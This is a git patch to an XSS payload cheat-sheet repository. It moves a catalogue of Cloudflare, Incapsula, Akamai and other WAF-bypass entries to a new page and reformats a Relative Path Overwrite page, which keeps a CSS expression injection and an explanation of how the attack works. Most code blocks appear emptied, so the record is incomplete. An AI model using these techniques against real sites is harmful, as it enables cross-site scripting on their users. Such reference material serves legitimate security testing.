From c34a2bac15cdc31ec88c60a191aada032045f25c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 3 Jun 2024 09:55:29 +0200 Subject: [PATCH] WAF bypass moved to a separate page --- XSS Injection/README.md | 119 +----------------- XSS Injection/XSS Common WAF Bypass.md | 103 +++++++++++++++ .../XSS with Relative Path Overwrite.md | 38 +++--- 3 files changed, 123 insertions(+), 137 deletions(-) create mode 100644 XSS Injection/XSS Common WAF Bypass.md diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 530dd9a39d..a5a487ee70 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -82,23 +82,6 @@ - [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline) - [Bypass CSP script-src self](#bypass-csp-script-src-self) - [Bypass CSP script-src data](#bypass-csp-script-src-data) - - [Common WAF Bypass](#common-waf-bypass) - - [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi) - - [25st January 2021](#25st-january-2021) - - [21st April 2020](#21st-april-2020) - - [22nd August 2019](#22nd-august-2019) - - [5th June 2019](#5th-june-2019) - - [3rd June 2019](#3rd-june-2019) - - [Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)](#cloudflare-xss-bypass---22nd-march-2019-by-rakeshmane10) - - [Cloudflare XSS Bypass - 27th February 2018](#cloudflare-xss-bypass---27th-february-2018) - - [Chrome Auditor - 9th August 2018](#chrome-auditor---9th-august-2018) - - [Incapsula WAF Bypass by @Alra3ees- 8th March 2018](#incapsula-waf-bypass-by-alra3ees--8th-march-2018) - - [Incapsula WAF Bypass by @c0d3G33k - 11th September 2018](#incapsula-waf-bypass-by-c0d3g33k---11th-september-2018) - - [Incapsula WAF Bypass by @daveysec - 11th May 2019](#incapsula-waf-bypass-by-daveysec---11th-may-2019) - - [Akamai WAF Bypass by @zseano - 18th June 2018](#akamai-waf-bypass-by-zseano---18th-june-2018) - - [Akamai WAF Bypass by @s0md3v - 28th October 2018](#akamai-waf-bypass-by-s0md3v---28th-october-2018) - - [WordFence WAF Bypass by @brutelogic - 12th September 2018](#wordfence-waf-bypass-by-brutelogic---12th-september-2018) - - [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019) - [References](#references) ## Vulnerability Details @@ -1254,111 +1237,11 @@ GET /?xss=&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070) -## Common WAF Bypass - -### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec) - -#### 25st January 2021 - -```html - - -``` - -#### 3rd June 2019 - -```html - - -xss'"> + ``` + +* 3rd June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec) + ```js + + + xss'"> - - - - -Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))} - + + + + + + Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))} + ``` @@ -28,12 +27,13 @@ Explanation of the vulnerability > The Meta element forces IE’s document mode into IE7 compatible which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert. > A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works. -Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php` -Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3` -MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php` +* Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php` +* Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3` +* MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php` From : `http://www.thespanner.co.uk/2014/03/21/rpo/` + ## Mutated XSS for Browser IE8/IE9 ```javascript @@ -46,4 +46,4 @@ IE will read and write (decode) HTML multiple time and attackers XSS payload wil ## References -- [TODO](TODO) \ No newline at end of file +- [RPO - Relative VS Absolute - The Spanner - Friday, 21 March 2014](http://www.thespanner.co.uk/2014/03/21/rpo/) \ No newline at end of file